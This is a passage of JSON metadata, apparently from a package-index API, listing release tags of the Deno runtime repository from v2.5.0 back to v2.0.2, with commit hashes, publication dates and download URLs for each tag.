2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:2